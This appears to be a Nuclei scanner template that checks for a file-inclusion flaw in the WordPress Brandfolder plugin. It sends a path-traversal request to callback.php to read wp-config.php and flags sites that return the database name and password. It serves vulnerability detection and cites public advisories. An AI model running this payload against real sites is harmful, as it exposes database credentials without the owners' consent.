id: brandfolder-lfi

info:
  name: Wordpress brandfolder plugin - RFI & LFI
  author: 0x_Akoko
  severity: high
  description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
  reference:
    - https://www.exploit-db.com/exploits/39591
    - https://cxsecurity.com/issue/WLB-2016030120
  tags: wordpress,wp-plugin,lfi,rfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
